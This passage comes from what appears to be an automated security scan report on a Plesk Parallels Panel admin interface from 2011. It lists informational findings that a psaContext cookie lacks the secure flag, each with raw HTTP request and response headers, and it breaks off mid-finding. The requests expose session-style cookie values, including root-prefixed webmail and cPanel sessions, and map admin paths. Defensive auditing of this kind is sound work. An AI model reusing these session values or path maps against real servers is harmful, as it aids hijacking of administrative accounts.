<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.17. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller-self/subscription-overview/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller-self/subscription-overview/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller-self/subscription-overview/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:13:38 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:13:38 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=deleted; expires=Fri, 24-Sep-2010 14:13:37 GMT; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:13:38 GMT Server: sw-cp-server Content-Length: 22558
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.18. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/listpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/list
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=resellers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/list?context=resellers HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=customers
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:11:49 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:11:49 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=resellers; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:11:49 GMT Server: sw-cp-server Content-Length: 14689
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.19. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/true/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/list/reset-search/true/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=resellers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/list/reset-search/true/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BarExpanded=True; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; locale=en-US; psaContext=home
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:42:20 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:42:20 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=resellers; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:42:21 GMT Server: sw-cp-server Content-Length: 14643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.20. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/login-info/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=credentials-info; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/login-info/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:13:35 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:13:36 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=credentials-info; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:13:36 GMT Server: sw-cp-server Content-Length: 9896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.21. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/personal-info/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=personal-info; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/personal-info/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=customers
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 14:17:12 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:17:12 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=personal-info; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:17:12 GMT Server: sw-cp-server Content-Length: 28204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.22. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/toolspreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/tools
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/tools HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 15:27:17 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:27:17 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=reseller-tools; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 15:27:17 GMT Server: sw-cp-server Content-Length: 9049
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.23. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/tools/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/tools/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:13:35 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:13:35 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=reseller-tools; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:13:36 GMT Server: sw-cp-server Content-Length: 9007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.24. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/tools/id/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/tools/id/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:13:35 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:13:35 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=reseller-tools; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:13:36 GMT Server: sw-cp-server Content-Length: 9007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.25. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/tools/id/3/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/tools/id/3/?context=reseller-tools HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=service-plans
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 14:15:44 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:15:44 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=reseller-tools; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:15:44 GMT Server: sw-cp-server Content-Length: 9058
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.26. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/settingspreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/server/settings
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=settings; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/server/settings?context=settings HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=subscriptions
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:11:27 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:11:27 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=settings; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:11:28 GMT Server: sw-cp-server Content-Length: 13093
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.27. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/toolspreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/server/tools
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/server/tools?context=tools HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=settings
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:11:34 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:11:34 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=tools; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:11:35 GMT Server: sw-cp-server Content-Length: 14558
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.28. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/listpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/subscription/list
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=subscriptions; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/subscription/list?context=subscriptions HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=domains
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:11:09 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:11:09 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=subscriptions; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:11:09 GMT Server: sw-cp-server Content-Length: 19549
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.29. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/subscription/list/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=subscriptions; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/subscription/list/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:01 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=subscriptions; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:01 GMT Server: sw-cp-server Content-Length: 19812
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.30. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
